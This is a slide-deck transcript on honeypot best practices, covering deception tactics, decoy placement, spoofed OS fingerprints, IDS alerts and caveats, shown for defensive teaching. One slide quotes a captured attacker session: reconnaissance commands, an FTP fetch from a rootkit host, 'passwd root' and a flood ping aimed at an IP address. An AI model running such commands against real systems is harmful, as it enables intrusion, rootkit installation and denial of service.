Top Banner
Honeypot Best Practices Honeypot Advantages & Disadvantages George Bakos - [email protected] Jay Beale - [email protected]
23

Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an...

Feb 01, 2018

Download

Documents

lydien
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Honeypot Advantages & Disadvantages

George Bakos - [email protected] Beale - [email protected]

Page 2: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Honeypot Advantages & Disadvantages

● Intelligence Gathering● Perception Management● Engineering Deception● Isn't an Intrusion Detection 

System enough?● Limits, caveats and legal & ethical 

concerns

Page 3: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Intelligence Gathering

– If you know the enemy and know yourself, you need not fear the result of a hundred battles.  If you know yourself but not the enemy, for every victory gained you will also suffer a defeat.

­­Sun Tzu, The Art of War

Page 4: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Intelligence Gathering#cd /;ls ­alF;w;uname ­a;id#ftp ftp.0catch.com#ls#ftp#open#ftp.0catch.com

# ping -f -s 65000 64.58.174.8&# ps ax !

#rootkit.0catch.com#szopol#ls#passwd root#wget

Page 5: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Perception ManagementBattlefield deception consists of those operations conducted at echelons theater (Army component) and below which purposely mislead enemy decision makers by­­    * Distortion.    * Concealment:

* Falsification of indicators of friendly intentions, capabilities, or dispositions.

­­ US Army FM­90­2

Page 6: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Perception Management

● False banners● False TCP/IP stacks● Decoy systems● Honeynets

Page 7: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Perception Management­ False Banners ­

Page 8: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Perception Management­ False Banners ­

Page 9: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Perception Management­ False TCP/IP Stacks ­

# wwww:ttt:mmm:D:W:S:N:I:OS Description## wwww ­ window size# ttt  ­ time to live# mmm  ­ maximum segment size# D    ­ don't fragment flag  (0=unset, 1=set) # W    ­ window scaling (­1=not present, other=value)# S    ­ sackOK flag (0=unset, 1=set)# N    ­ nop flag (0=unset, 1=set)# I    ­ packet size (­1 = irrevelant)

Page 10: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Perception Management­ False TCP/IP Stacks ­

# wwww:ttt:mmm:D:W:S:N:I:OS Description

 5840:128:536:1:0:1:1:48:Windows 95 (3)16060:64:1460:1:0:1:1:60:Debian/Caldera Linux 2.2.x8760:255:1380:1:0:0:0:44:Solaris 2.7

Page 11: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Perception Management­ Decoys, Honeypots, Honeynets ­

● Low Interaction● High Interaction● Emulators● Null Listeners● Virtual Systems● Physical Systems

Page 12: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Engineering Deception

...he is skillful in defense whose opponent does not know what to attack.

­­Sun Tzu, The Art of War

Page 13: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Engineering Deception­ Exposed Decoys ­

WWW

SMTP/DNS

HoneypotWWW

HoneypotSMTP/DNS

Thanks for the intel!

Page 14: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Engineering Deception­ Interleaved Decoys ­

WWW

SMTP/DNS

Honeypot

Honeypot

Thanks for the intel!

DMZ

Host

Host

HP

Host

HP

Page 15: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Engineering Deception­ Lateral Decoys ­

HP

HPHP

HP

WWW

SMTP/DNS

Host

Host

Host

HP

HP

HP

Host

Host10.2.4.0/22

10.2.8.0/22

Page 16: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Engineering Deception

● Production Honeypots– IDS enhancement / augmentation– Cloud the battlefield; lay a "Minefield" 

(Mantrap)– Insiders / Outsiders

Page 17: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Engineering Deception

● Research Honeypots– 0­day discovery– Education & awareness– Trend analysis

● Security Alliances– ISACs, Honeynet Alliance

Page 18: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Isn't Network IDS enough?[**] [1:618:2] SCAN Squid Proxy attempt [**][Classification: Attempted Information Leak] [Priority: 2]11/04­08:09:27.772993 216.218.184.2:3704 ­> 10.2.87.142:3128TCP TTL:49 TOS:0x0 ID:35607 IpLen:20 DgmLen:44 DF******S* Seq: 0x13C82726  Ack: 0x0  Win: 0x4000  TcpLen: 24TCP Options (1) => MSS: 1412 

[**] [100:1:1] spp_portscan: PORTSCAN DETECTED from 216.218.184.2 (THRESHOLD 4 connections exceeded in 0 seconds) [**]11/04­20:19:09.882416 

Snort Network Intrusion Detection System alerthttp://www.snort.org

Page 19: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Isn't Network IDS enough?

GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/3128/10­2­87­142 HTTP/1.0Connection: closePragma: no­cacheAccept: text/htmlHost: 216.218.184.9User­Agent: Mozilla/4.0 (compatible; MSIE 5.5; AOL 5.0; Windows 98)CLIENT­IP: 10.2.87.142X­FORWARDED­FOR: 10.2.87.142

Tiny Honeypot log

Page 20: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Isn't Network IDS enough?

GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/81/10­2­87­142 HTTP/1.0Connection: closePragma: no­cacheAccept: text/htmlHost: 216.218.184.9User­Agent: Mozilla/4.0 (compatible; MSIE 5.5; AOL 5.0; Windows 98)CLIENT­IP: 10.2.87.142X­FORWARDED­FOR: 10.2.87.142

Tiny Honeypot log

Page 21: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Caveats (There's no free lunch)

● if ($value == "high") { $cost = "high" }– Deployment costs– Analysis costs– Potential for greater risk

Page 22: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Caveats (There's no free lunch)

Page 23: Honeypot Advantages & · PDF fileHoneypot Best Practices Honeypot Advantages & Disadvantages Intelligence Gathering Perception Management Engineering Deception Isn't an Intrusion Detection

Honeypot Best Practices

Honeypot Advantages & Disadvantages

George Bakos - [email protected] Beale - [email protected]


Related Documents
Database honeypot by design

Database honeypot by design

Category: Technology
Rapport Honeypot

Rapport Honeypot

Category: Documents
Intrusion Detection using Honeypot and Support Vector ...ethesis.nitrkl.ac.in/7997/1/672.pdf · Intrusion Detection using Honeypot and Support Vector ... using Honeypot and Support

Intrusion Detection using Honeypot and Support Vector...

Category: Documents
HONEYPOT COTTAGE - media.rightmove.co.uk

HONEYPOT COTTAGE - media.rightmove.co.uk

Category: Documents
Honeypot Security - BrainStorm · awesome-honeypots (open-source). Allows IT department to become proactive on cyber security. Honeypot Security Honeypot planning cycle At least one

Honeypot Security - BrainStorm · awesome-honeypots...

Category: Documents
Keamanan Jaringan Honeypot · 2019. 12. 18. · Honeynet : kumpulan sistem untuk menjebak Honeypot Honeynet. Honeypot - Dionaea. Macam-macam Honeypot : Tools yang digunakan menurut

Keamanan Jaringan Honeypot · 2019. 12. 18. · Honeynet :....

Category: Documents
HoneyPot –Infront’s Azure · PDF fileHoneyPot –Infront’s Azure Chargeback Tool & Reports. Azure Chargeback Report. Reports By Time. Reports By Business Units. Reports By Site

HoneyPot –Infront’s Azure · PDF fileHoneyPot...

Category: Documents
Computerized Honeypot

Computerized Honeypot

Category: Documents
Honeypot Advantages & Disadvantages - Institute for Security

Honeypot Advantages & Disadvantages - Institute for Security

Category: Documents
HONEYPOT. Introduction to Honeypot Honeytoken Types of Honeypots Honeypot Implementation Advantages and Disadvantages Role of Honeypot in.

HONEYPOT. Introduction to Honeypot Honeytoken Types of...

Category: Documents
Honeypot Road

Honeypot Road

Category: Documents
135 Honeypot Forensics Slides

135 Honeypot Forensics Slides

Category: Documents